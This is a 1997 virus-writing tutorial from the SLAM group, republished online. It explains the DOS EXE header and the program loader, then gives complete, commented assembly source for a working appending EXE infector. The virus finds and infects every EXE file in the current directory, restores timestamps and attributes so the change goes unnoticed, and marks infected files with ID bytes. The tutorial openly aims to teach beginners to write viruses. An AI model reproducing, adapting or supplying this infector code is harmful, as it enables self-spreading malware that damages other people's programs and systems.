SLAM4.019: Direct EXE infection tutorial by Virtual Daemon/SLAM

Published in Slam · 3 Mar 2022

Direct EXE infection tutorial
by Virtual Daemon


Well, here we go again... ;) This time, with something more "advanced"! :P Now that U've seen how a direct COM virus works, it's time to check out the other friend of the programmer: the EXE file. Again, I must tell ya that the information provided in this tutorial is only for the beginners' corner, so if U have already made a simple EXE infector, I don't see the point for U to hang around here anymore... Go away and do something more useful... Clean the house, cook dinner, drink a beer, go to a movie, or whatever U feel like doing now, but please .... GO! :)

Ok. Since U're still here, I imagine that U don't know what the hell an EXE file is, how it works and how to infect it... Well relax, bcoz this little tutorial will do the trick for U. I'll try to keep it as simple as I can, and I'll make sure that U will get all this crap. So, hold on in there bcoz U ain't going nowhere till U get this... :)

First of all, you need to know what an EXE program is, how it works, and what its structure is. I won't give you too much technical shit, bcoz U won't understand it anyway. Don't worry, it will come to you later, after you work on it for a while.

Well, in my previous tutorial (Direct COM infections) I told you that COM files are the simplest binary programs, also called memory images. Due to the size restriction (max 64K = the size of one segment), COM programs aren't used much these days... A programmer trying to develop good software or a large application needs more space than that. So, here begins our little trip to EXEland... :)

COM programs are still used for small, tiny applications or utilities, but the true power of a program lies in an EXE file.

"So, how can an EXE program be so different from a COM one?", you wonder... Well, the main advantage of the EXE program is that its size isn't limited to 64k. That means that an EXE program can have any size U want it to have... The only thing that will stop you is your RAM or your HD!

Anyway, a program bigger than 64k can't be loaded and executed in a single segment anymore! Well, this is the most important feature of an EXE file: it can have more than one segment. So, from now on, U won't be forced to erase parts of your application, or destroy some of your variables, just bcoz you can't fit all your stuff in those 64k... :)

Well, now U know that the EXE files may make use of multiple segments for code, stack, and data. The design of the EXE file reflects the segmented design of the Intel 80x86 CPU architecture.

Another important thing is that an EXE program can be loaded at any memory location. This means that all the instructions that contain segment addresses must be adjusted, like:

  • JMP/CALL FAR PTR name
  • MOV reg, SEG name
  • MOV reg_seg, value

This process is called "relocation" and it's executed when the program loads in memory. Anyway, this isn't so important for you right now... ;)

Well, it is *ABSOLUTELY* obvious that an EXE program must contain, besides your program (code), some technical information about the relocatable symbols, the start address, the address of the stack segment, etc. This information is stored in the first part of your EXE file, called "the EXE header".

So, an EXE file is separated in 2 parts: the header and the real program.

Now that you know all this, let's see what the EXE header looks like:

+--------+------+----------+-------------------------------------------+
| Offset | Size | Contents | Description                               |
+--------+------+----------+-------------------------------------------+
|. 0h    | Word | 4Dh 5Ah  | EXE signature (4Dh='M', 5Ah='Z'). The two |
|        |      |          | letters stand for Mark Zbikowski, one of  |
|        |      |          | the major DOS coders at Microsoft. Note:  |
|        |      |          | in some cases MZ can be replaced with ZM  |
|        |      |          | (5Ah 4Dh).                                |
+--------+------+----------+-------------------------------------------+
|* 2h    | Word | PartPag  | Length of file modulo 512, i.e. the       |
|        |      |          | number of bytes used in the last page.    |
+--------+------+----------+-------------------------------------------+
|* 4h    | Word | PageCnt  | Size of the file in 512-byte pages,       |
|        |      |          | including the header. If the last page is |
|        |      |          | not full, it is still counted.            |
+--------+------+----------+-------------------------------------------+
|  6h    | Word | ReloCnt  | Number of items in the relocation table.  |
+--------+------+----------+-------------------------------------------+
|  8h    | Word | HdrSize  | Size of the header in 16-byte paragraphs. |
|        |      |          | Used to locate the beginning of the real  |
|        |      |          | program (load module) in the file.        |
+--------+------+----------+-------------------------------------------+
|  0Ah   | Word | MinMem   | Minimum memory required above the end of  |
|        |      |          | the loaded program (16-byte paragraphs).  |
+--------+------+----------+-------------------------------------------+
|  0Ch   | Word | MaxMem   | Maximum memory required above the end of  |
|        |      |          | the loaded program (16-byte paragraphs).  |
|        |      |          | If both the minimum and the maximum are   |
|        |      |          | zero, the program is loaded as high in    |
|        |      |          | memory as possible.                       |
+--------+------+----------+-------------------------------------------+
|* 0Eh   | Word | ReloSS   | Segment offset of the stack segment       |
|        |      |          | (used for setting the SS register).       |
+--------+------+----------+-------------------------------------------+
|* 10h   | Word | ExeSP    | Value of the SP register (stack pointer)  |
|        |      |          | when the program is started.              |
+--------+------+----------+-------------------------------------------+
|. 12h   | Word | Checksum | Negative sum of all words in the file,    |
|        |      |          | ignoring overflow. Good place to store    |
|        |      |          | the ID bytes of your virus... :)          |
+--------+------+----------+-------------------------------------------+
|* 14h   | Word | ExeIP    | Value of the IP register (initial         |
|        |      |          | instruction pointer) when the program is  |
|        |      |          | started.                                  |
+--------+------+----------+-------------------------------------------+
|* 16h   | Word | ReloCS   | Segment offset of the code segment        |
|        |      |          | (used for setting the CS register).       |
+--------+------+----------+-------------------------------------------+
|. 18h   | Word | TablOff  | File offset of the relocation table       |
|        |      |          | (often set to 1Ch).                       |
+--------+------+----------+-------------------------------------------+
|. 1Ah   | Word | Overlay  | Overlay marker (0 for the base module).   |
+--------+------+----------+-------------------------------------------+
|  1Ch   | Byte | ?        | (undocumented) Usually equal to 01h, this |
|        |      |          | value indicates the size of the formatted |
|        |      |          | portion of the EXE header.                |
+--------+------+----------+-------------------------------------------+
|  ?     | 4*?  | Ofs Seg  | Relocation table.                         |
|        |      | ....     | Has [EXE+6] DWORD entries.                |
|        |      | Ofs Seg  |                                           |
+--------+------+----------+-------------------------------------------+
|  ?     | ?    |          | Filler to a paragraph boundary.           |
+--------+------+----------+-------------------------------------------+


Note: the offsets marked with

  • '*' = important for our virus
  • '.' = optional for our virus
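
If U want to poke at the header fields from the table without firing up a debugger, a few lines of script will do. What follows is only a rough sketch in Python (not the language of this tutorial); the names `MZHeader` and `parse_mz_header` are made up for the example, and the sample bytes are hand-built, not taken from any real program.

```python
import struct
from collections import namedtuple

# Field names follow the header table; the formatted header is a 2-byte
# signature followed by 13 little-endian words (1Ch bytes in total).
MZHeader = namedtuple(
    "MZHeader",
    "signature part_pag page_cnt relo_cnt hdr_size min_mem max_mem "
    "relo_ss exe_sp checksum exe_ip relo_cs tabl_off overlay",
)

def parse_mz_header(data: bytes) -> MZHeader:
    """Decode the first 1Ch bytes of a DOS EXE into named fields."""
    if len(data) < 0x1C:
        raise ValueError("need at least 1Ch bytes for the formatted header")
    header = MZHeader(*struct.unpack_from("<2s13H", data, 0))
    if header.signature not in (b"MZ", b"ZM"):
        raise ValueError("not an MZ executable")
    return header

# Hand-built sample header (illustrative values only).
sample = struct.pack(
    "<2s13H", b"MZ", 0x50, 3, 1, 2, 0x10, 0xFFFF, 5, 0x100, 0, 0, 0, 0x1C, 0
)
hdr = parse_mz_header(sample)
print(hdr.page_cnt, hex(hdr.tabl_off))  # prints: 3 0x1c
```

To try it on a real file, read the first 1Ch bytes in binary mode and pass them to `parse_mz_header`.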

Ok. Why important offsets and why optional? Well, the optional offset can be used for checking different things like:

  • the EXE signature (MZ or ZM) can be used to check if the file you have found is really an EXE file and not just a ordinary re-named file;
  • the Checksum from offset 12h can be a good place to store your ID bytes (ID bytes=one or two bytes that will "mark" an infected file);
  • the TablOff from offset 18h can be used to check if the file is a normal DOS EXE file or if it is a PE or NE file. To check this, see if the TablOff is 64 (40h) or greater. If it is, then the EXE file is in NE or PE format and you won't be able to infect it... Important Note: all "normal" Windows EXE files have TablOff equal to '@' (40h)!
  • the Overlay word value located at offset 1Ah can be used to check if the file has overlays or not. To check this, compare the Overlay with 0. If equal then the file doesn't have overlays and all it's ok. If not, then the file has internal overlays (in most of the cases) and by infecting it you will destroy the informations.
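
The signature and TablOff checks from the list can be tried out from a script. This is a hedged sketch in Python: `classify_exe` is a made-up name, and the lookup of the new header through the dword at offset 3Ch is not covered in this tutorial; it comes from the NE/PE file layouts. The test data is hand-built.

```python
import struct

def classify_exe(data: bytes) -> str:
    """Rough file-type guess based on the MZ signature and TablOff."""
    if len(data) < 0x1C or data[:2] not in (b"MZ", b"ZM"):
        return "not MZ"
    (tabl_off,) = struct.unpack_from("<H", data, 0x18)
    if tabl_off < 0x40:
        return "DOS MZ"
    if len(data) >= 0x40:
        # Assumption from the NE/PE layouts: offset 3Ch holds the file
        # offset of the new-style header, which starts with 'NE' or 'PE'.
        (new_off,) = struct.unpack_from("<I", data, 0x3C)
        tag = bytes(data[new_off:new_off + 2])
        if tag in (b"NE", b"PE"):
            return tag.decode("ascii")
    return "MZ with extended header"

# Hand-built samples (illustrative only).
dos = bytearray(0x1C)
dos[0:2] = b"MZ"
struct.pack_into("<H", dos, 0x18, 0x1C)

win = bytearray(0x84)
win[0:2] = b"MZ"
struct.pack_into("<H", win, 0x18, 0x40)
struct.pack_into("<I", win, 0x3C, 0x80)
win[0x80:0x84] = b"PE\x00\x00"

print(classify_exe(bytes(dos)))  # prints: DOS MZ
print(classify_exe(bytes(win)))  # prints: PE
```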

It would be very good if U could do some tests with the EXE header, like opening a bunch of EXE files, reading some info from the header (like PartPag and PageCnt) and then comparing it with the real values (the real size of the file). To find the size of a file use the following formula:

 Size_of_File:=((PageCnt-1)*512)+PartPag

Note: when PartPag is 0 the last page is completely full, so the size is simply PageCnt*512.
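
Here is the size formula as a tiny Python sketch, so U can compare it against the real file size. The function name `exe_image_size` is made up for the example. It also handles the case where PartPag is 0, meaning the last page is completely full.

```python
def exe_image_size(page_cnt: int, part_pag: int) -> int:
    """File size in bytes as described by the PageCnt and PartPag fields."""
    if part_pag == 0:
        # The last page is full, so every counted page holds 512 bytes.
        return page_cnt * 512
    # All pages but the last are full; the last one holds PartPag bytes.
    return (page_cnt - 1) * 512 + part_pag

print(exe_image_size(3, 0x50))  # prints: 1104
print(exe_image_size(2, 0))     # prints: 1024
```

If the number U get is smaller than the size on disk, the file most likely carries extra data (overlays, debug info) after the load image.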


The relocation table contains the addresses of all the words that need "adjustment". The relocation table has ReloCnt elements beginning at position TablOff in the file, and its size is ReloCnt*4 bytes.
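
Reading the relocation table is just a matter of pulling ReloCnt pairs of words starting at TablOff. A minimal Python sketch, assuming the whole file is already in memory; `read_relocations` is a made-up name and the sample data is hand-built.

```python
import struct

def read_relocations(data: bytes, tabl_off: int, relo_cnt: int):
    """Return the relocation items as (offset, segment) pairs."""
    # Each item is 4 bytes: a 16-bit offset followed by a 16-bit segment.
    return [
        struct.unpack_from("<HH", data, tabl_off + 4 * i)
        for i in range(relo_cnt)
    ]

# Hand-built sample: an empty 1Ch-byte header followed by two items.
sample = bytes(0x1C) + struct.pack("<HHHH", 2, 0, 0x10, 1)
print(read_relocations(sample, 0x1C, 2))  # prints: [(2, 0), (16, 1)]
```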

Now that you know how EXE files look, let's take a look at how they work.

Loading and relocating the program is done by the DOS Exec function (4bh) in the following steps:

  1. Create a PSP via DOS Function 26h
  2. Read 1Ch bytes from the EXE file (the formatted portion of the EXE header) into a local memory area
  3. Determine the load module size = (PageCnt*512)-(HdrSize*16), minus (512-PartPag) if PartPag is not 0
  4. Determine file offset of load module = (HdrSize*16)
  5. Select a segment address START_SEG for loading (usually PSP+10h)
  6. Read the load module into memory starting at START_SEG:0000
  7. LSEEK (set file pointer) to the start of the relocation table (TablOff)
  8. For each relocation item (ReloCnt):
    • read the item as two 16-bit words (I_OFF,I_SEG)
    • find the address of relocation ref RELO_SEG=(START_SEG+I_SEG)
    • read the current value, the word from address RELO_SEG:I_OFF
    • perform the segment fixup by adding START_SEG to that word
    • store the value back to its original address (RELO_SEG:I_OFF)

  9. Allocate memory for the program according to MinMem and MaxMem
  10. Initialize registers and execute program:
    • ES=DS=PSP
    • SS=START_SEG+ReloSS
    • SP=ExeSP
    • CS=START_SEG+ReloCS
    • IP=ExeIP

Note: the initialization of CS and IP is done by

PUSH START_SEG+ReloCS 
PUSH ExeIP
RETF
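
To see the loader steps in action without DOS, here is a rough simulation in Python of steps 3 to 8 and 10: cut out the load module, apply the segment fixups and work out the start registers. It is only a sketch of what the list describes, not how DOS really implements it; `load_and_relocate` is a made-up name, the load segment 1000h is an arbitrary choice, and the tiny EXE image is hand-built.

```python
import struct

def load_and_relocate(exe: bytes, start_seg: int):
    """Simulate loading: return the fixed-up load module and start registers."""
    part_pag, page_cnt, relo_cnt, hdr_size = struct.unpack_from("<4H", exe, 0x02)
    relo_ss, exe_sp, _checksum, exe_ip, relo_cs, tabl_off = struct.unpack_from(
        "<6H", exe, 0x0E
    )
    hdr_bytes = hdr_size * 16
    # End of the image in the file; a PartPag of 0 means a full last page.
    image_end = page_cnt * 512 if part_pag == 0 else (page_cnt - 1) * 512 + part_pag
    module = bytearray(exe[hdr_bytes:image_end])
    for i in range(relo_cnt):
        i_off, i_seg = struct.unpack_from("<HH", exe, tabl_off + 4 * i)
        pos = i_seg * 16 + i_off  # position inside the load module
        (value,) = struct.unpack_from("<H", module, pos)
        # Segment fixup: add the load segment, wrapping at 16 bits.
        struct.pack_into("<H", module, pos, (value + start_seg) & 0xFFFF)
    regs = {
        "CS": (start_seg + relo_cs) & 0xFFFF,
        "IP": exe_ip,
        "SS": (start_seg + relo_ss) & 0xFFFF,
        "SP": exe_sp,
    }
    return module, regs

# Hand-built 48-byte EXE: 32-byte header (one relocation item at 1Ch)
# followed by a 16-byte load module whose word at offset 2 needs a fixup.
header = struct.pack("<2s13H", b"MZ", 48, 1, 1, 2, 0, 0xFFFF, 0, 0x80, 0, 0, 0, 0x1C, 0)
relocs = struct.pack("<HH", 2, 0)
body = b"\x90\x90" + struct.pack("<H", 1) + bytes(12)
module, regs = load_and_relocate(header + relocs + body, 0x1000)
print(hex(struct.unpack_from("<H", module, 2)[0]), hex(regs["CS"]))  # prints: 0x1001 0x1000
```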


Well, I hope this covers all you wanted and have to know about EXE programs. Now let's get back to some action...;P First the theory and then the code.

EXE infection isn't that different from COM infection. The main difference between the 2 types of infection is that the EXE one needs some calculations. You learned (I hope ;) how a COM virus replicates: save the 1st 3 (or more) bytes from BOF (beginning of program) in a buffer, go to the EOF (end of file) and write the virus body, build a JMP instruction with the location to the end of file (respectively our virus), then write the new JMP to BOF and finally restore control to original program (host). Well EXE infection is mostly the same shit. Aehm... here are the steps:

  • read the EXE header (from BOF of course ;) in a buffer (1ch bytes)
  • save from the EXE header some values that will be needed when we'll pass control to the original file (ReloSS, ExeSP, ExeIP and ReloCS from 0eh, 10h, 14h and 16h - respectively SS, SP, IP and CS registers)
  • calculate new values (offsets) for stack segment (SS) and code segment (CS), adjust the IP register (see bellow)
  • go to EOF and write the virus body
  • calculate new values for PartPag (offset 02h) and PageCnt (offset 04h) (see bellow)
  • go to BOF and overwrite the old header with our new copy
  • pass control to our host by reseting stack to original value and by setting the CS:IP to point to original entry point, and DS and ES to point to PSP.

Well, like I said for this is just pure theory... I'll try to explain some of it now, and then we'll get to our real goal... :)

I bet you are wondering what is that bullshit with "calculating new values for CS:IP"... Well, if we look a little to the EXE header we see what this values means!

 CS:IP=ReloCS:ExeIP


ReloCS = offset of code segment... this value represents the offset of the program's code. Why are we modifying this? Well, we must make the file to jump to our virus first, right? This can't be done like we've done it with COMs, by putting a JMP to beginning of file. All we have to do on EXEs is to make the ReloCS to point to our virus instead of pointing to the real code.Then, when the virus has finished its work, we will pass control to the real program by putting back the old ReloCS value (in memory, not on disk).

ExeIP = value for IP register when the program is started... But what is this IP register anyway? The IP register contains the address of the current instruction. So, we'll modify the IP register to point to our first instruction from the virus body (the entry point of our virus).

This is the part with the calculation of CS and IP. The SS (stack segment) register should be equal to CS (code segment), so after you have found out the value for CS, just equal SS to it too (for calculation, see the virus).

The next important thing that must be modified from the EXE header is PartPag and PageCnt. Since the file has grown in size, we must re-calculate the file size and we must overwrite offsets 2 and 4 with the new values.

That's all... It's easy isn't it?

Now... the virus! If you don't get something from above, now it's the chance for you to understand.

Btw, this isn't the simplest EXE infector... it's just the simplest DECENT EXE infector. All the code is well commented, so you shouldn't have any problem understanding it.

All the steps are directly written in the virus code... It's easier to get it this way, believe me!

Well, here it is... it's not my best, but i'm sure it's hell enough for you to learn the basic EXE appender. The code is not very well optimized... well, I guess that this is ur job! :-)) Bugs? Hmm... don't know any... if there are, learn by correcting them. ;)

Have fun!

---------- cut here ---------- 
; Name: Example
; Type: Direct appending EXE infector
; Size: 472 bytes
; Comments: the virus will search for EXE files in current directory. If no
; filles are found, the virus will restore control to its host. If
; it founds EXEs, he will try to infect the first one. If the file
; has been already infected, he will close the file and search for
; another one. The cycle will repeat untill all the EXE filles from
; current directory are infected.
; The virus infects read-only filles and restore time/date/attributes.
; The virus will check too see if: - the file is really EXE (MZ scan)
; - the file is a Windows EXE
; - the file has internal overlays
; Assembled with: tasm example.asm
; tlink /t example.obj
code segment
assume cs:code,ds:code
org 100h ;starts at 100h => 1st host will be a COM file
virus_start:
db 0e9h,3,0 ;jump to begin
our_host:
db 0cdh,20h,0 ;=Int 20h
begin:
call find_offset
find_offset:
; -------------------- Step 1 - Calculate the DELTA offset --------------------
pop bp ;bp holds IP at start
sub bp,offset find_offset ;=>bp=delta offset

push ds es ;save original DS and ES

push cs
pop ds ;CS=DS

; ----------------- Step 2 - Save parts of the header on stack ----------------
; _cs is the offset used by our JMP instruction to return to the host
; exe_cs is the original CS register
mov ax,word ptr [bp+exe_cs] ;equal _cs with exe_cs
mov word ptr [bp+_cs],ax

;save CS:IP and SS:SP on stack
push [bp+exe_cs] ;save CS
push [bp+exe_ip] ;save IP
push [bp+exe_ss] ;save SS
push [bp+exe_sp] ;save SP

; -------------------------- Step 3 - Set a new DTA ---------------------------
mov ah,1ah ;DOS function=Set Disk Transfer Address
lea dx,[bp+offset dta] ;set a new DTA buffer
int 21h

; ------------------------- Step 4 - Find a EXE file --------------------------
mov ah,4eh ;DOS function=Find 1st Matching File
lea dx,[bp+filespec] ;search for "filespec" files only (*.EXE)
mov cx,7 ;any file attribute
do_it:
int 21h
jnc next_step ;if no error, continue
jmp exit ;if error then pass control to host
next_step:
; ----------------------- Step 5 - Get file attributes ------------------------
mov ax,4300h ;DOS function=Get File Attributes
lea dx,[bp+offset dta+1eh] ;get file name from DTA (offset 1eh)
int 21h
mov word ptr [bp+file_attr],cx ;save the file attributes

; ----------------- Step 6 - Set new attributes (archive only) ----------------
mov ax,4301h ;DOS function=Set File Attributes
lea dx,[bp+offset dta+1eh] ;get file name from DTA (offset 1eh)
xor cx,cx ;set archive only attributes
int 21h

; ------------------- Step 7 - Open file for RW (read-write) ------------------
mov ax,3d02h ;DOS function=Open File For Read-Write
lea dx,[bp+offset dta+1eh] ;get file name from DTA (offset 1eh)
int 21h
jnc continue ;if no error, continue
jmp abort ;if error put old attributes and search for
;another file
continue:
xchg bx,ax ;put file handle in bx

; ------------------------ Step 8 - Get file time/date ------------------------
mov ax,5700h ;DOS function=Get File Time/Date
int 21h
mov word ptr [bp+file_time],cx ;save file time
mov word ptr [bp+file_date],dx ;save file date

; ------------------------ Step 9 - Read the Exe header -----------------------
mov ah,3fh ;DOS function=Read From File
mov cx,1ch ;read the EXE header (1ch bytes)
lea dx,[bp+offset header] ;store it into our 'header' buffer
int 21h

; ----------------- Step 10 - Check if the file is a real EXE -----------------
cmp word ptr [bp+header],'ZM' ;check if the 1st 2 bytes are MZ or ZM
je infect
cmp word ptr [bp+header],'MZ'
je infect
jmp another ;if not equal then the file isn't a real EXE
;it's just a re-named file
infect:
; -------------- Step 11 - Check if the file is already infected --------------
cmp word ptr [bp+header+10h],'DV' ;check for our ID bytes
jne done
jmp another ;if equal then the file has already been
;infected
done:
; --------------- Step 12 - Check if the file is a Windows EXE ----------------
;Note: you could also check for NE or PE by comparing if greater then 64
cmp byte ptr [bp+header+18h],'@' ;check to see if the file is a WinEXE
jne no_win
jmp another ;oups... WinEXE here. We can't infect it this
;way...
no_win:
; ------------- Step 13 - Check if the file has internal overlays -------------
cmp word ptr [bp+header+1ah],0 ;check for internal overlays
je no_overlay
jmp another
no_overlay:
push bx ;save file handle

; -------------- Step 14 - Save important parts from the header ---------------
mov ax,word ptr [bp+header+0eh] ;save SS
mov word ptr [bp+exe_ss],ax
mov ax,word ptr [bp+header+10h] ;save SP
mov word ptr [bp+exe_sp],ax
mov ax,word ptr [bp+header+14h] ;save IP
mov word ptr [bp+exe_ip],ax
mov ax,word ptr [bp+header+16h] ;save CS
mov word ptr [bp+exe_cs],ax

; ------------------- Step 15 - Seek to EOF (end of file) ---------------------
mov ax,4202h ;DOS function=Set File Pointer (Seek) to EOF
xor cx,cx
cwd
int 21h

push ax dx ;ax and dx holds the file size

; ---------------- Step 16 - Calculate the new CS:IP address ------------------
;
; Short theory
; ------------
;
; We need to get the size of the EXE header in paras. Then we have to convert
; it into bytes (by multiplying with 16). After this, we have to substract the
; header size from the file size, and then to put it back into the seg:ofs form.
; We accomplish this by divideing with 16.
;
mov bx,word ptr [bp+header+8h] ;get the size of the header in para
;a paragraph is 16 bytes and we need the size in bytes, so we multiply by 16
mov cl,4
shl bx,cl ;shl will rotate the bits to left with 4
;positions. this is the same result as
;multiplying with 16.
;now, BX is equal to length of header in bytes
;AX holds the filesize (low word)
sub ax,bx ;now we substract the size of the header from
;the size of the file
sbb dx,0 ;if CF is set it will substract 1, else 0
;now, DX:AX will contain the file size-the size of the header

;we must convert the DX:AX to segment:offset form because now it's just a value
;for converting to segment:offset we must divide by 16 (it's obvious why...we
;multiplyed by 16 when we had to trasform into bytes... now we're going back)
mov cx,10h ;cx=10h=16

div cx ;divide by 16
; AX=(DX:AX) / 16
; DX=(DX:AX) mod 16
;now, the DX:AX contains the CS:IP entry point (stored backwards - IP:CS)

;save the new CS:IP in the header buffer. also save the SS and put our ID bytes.
mov word ptr [bp+header+14h],dx ;put the offset (ExeIP)=new entry point
mov word ptr [bp+header+16h],ax ;put the segment offset of code seg
mov word ptr [bp+header+0eh],ax ;put the segment offset of stack seg
mov word ptr [bp+header+10h],'DV' ;put our ID bytes at 10h
; blah... you could use 12h (ChkSum) instead of 10h...

pop dx ax bx ;restore original file size and file handle

; ---------- Step 17 - Calculate new values for PartPag and PageCnt -----------
;
; Short theory
; ------------
;
; This one is simple. All we have to do, is to add the size of our virus
; to the size of the file, and then to convert it into pages by divideing with
; 512.
;

; AX and DX holds the file size
add ax,heap-begin ;add the virus size to the original file size
adc dx,0 ;if CF add 1, else 0
mov cx,512 ;convert the result into pages by divideing
div cx ;with 512
inc ax ;add one for rounding up
mov word ptr [bp+header+4],ax ;put new PageCnt
mov word ptr [bp+header+2],dx ;put new PartPag

; ------------------- Step 18 - Write the virus body to EOF -------------------
mov ah,40h ;DOS function=Write To File
mov cx,heap-begin ;cs=size to write=size of our virus
lea dx,[bp+offset begin] ;start from "begin"
int 21h

; ----------------- Step 19 - Seek to BOF (beginning of file) -----------------
mov ax,4200h ;DOS function=Set File Pointer (Seek) to BOF
xor cx,cx
cwd
int 21h

; ---------------------- Step 20 - Write the new header -----------------------
mov ah,40h ;DOS function=Write To File
mov cx,1ch ;cx=size to write=size of the EXE header
lea dx,[bp+offset header] ;write from "header" buffer
int 21h

; ----------------- Step 21 - Restore original file time/date -----------------
mov dx,word ptr [bp+file_date] ;dx=original date value
mov cx,word ptr [bp+file_time] ;cx=original time value
mov ax,5701h ;DOS function=Set File Time/Date
int 21h
another:
; ------------------------- Step 22 - Close the file --------------------------
mov ah,3eh ;DOS function=Close File
int 21h
abort:
; ------------------- Step 23 - Restore original attributes -------------------
mov ax,4301h ;DOS function=Set File Attributes
lea dx,[bp+offset dta+1eh] ;get file name from DTA
mov cx,word ptr [bp+file_attr] ;restore original attributes
int 21h

; -------------------- Step 24 - Search for a new EXE file --------------------
mov ah,4fh ;DOS funtion=Find Next Matching File
lea dx,[bp+filespec] ;search for "filespec" files only (*.EXE)
jmp do_it
exit:
; ------------- Step 25 - Restore parts of the header from stack --------------
;restore CS:IP and SS:SP from stack
pop [bp+exe_sp] ;restore SP
pop [bp+exe_ss] ;restore SS
pop [bp+exe_ip] ;restore IP
pop [bp+exe_cs] ;restore CS
; ------------------------- Step 26 - Restore the DTA -------------------------
mov ah,1ah ;DOS function=Set Disk Transfer Address
mov dx,80h ;change the DTA to original (DTA is stored at 80h in the PSP)
int 21h

pop es ds ;restore ES and DS registers

; ------------------- Step 27 - Restore control to the host -------------------
mov ax,es ;ax will point to PSP
add ax,10h ;skip over PSP (ax<-PSP+10h)
add word ptr cs:[bp+_cs],ax

; _ip is one of the offsets for our jump to return to the host
; see step 2 for setting CS
mov bx,word ptr cs:[bp+exe_ip] ;make _ip equal with exe_ip
mov word ptr cs:[bp+_ip],bx

cli ;clear interrupt flag
mov sp,word ptr cs:[bp+exe_sp] ;adjust ExeSP
add ax,word ptr cs:[bp+exe_ss] ;restore the stack
mov ss,ax ;adjust ReloSS
sti ;set interrupt flag

xor ax,ax ;clear registers: ax,bx,cx,dx,si,di
xor bx,bx
xor cx,cx
xor dx,dx
xor di,di
xor si,si
xor bp,bp

db 0eah ;jmp far ptr seg:ofs (CS:IP)
_ip dw 0 ;IP and CS registers used as offset for
_cs dw 0 ;db 0eah (JMP) instruction

;these are the original values for CS:IP and SS:SP
exe_cs dw 0fff0h ;CS:IP
exe_ip dw 0
exe_sp dw 0 ;SS:SP
exe_ss dw 0
filespec db '*.exe',0
heap: ;this is the end of the virus
file_attr dw ?
file_time dw ?
file_date dw ?
header db 1ch dup (?)
dta db 43 dup (?)
code ends
end virus_start
---------- cut here ----------


Virtual Daemon / SLAM 1997
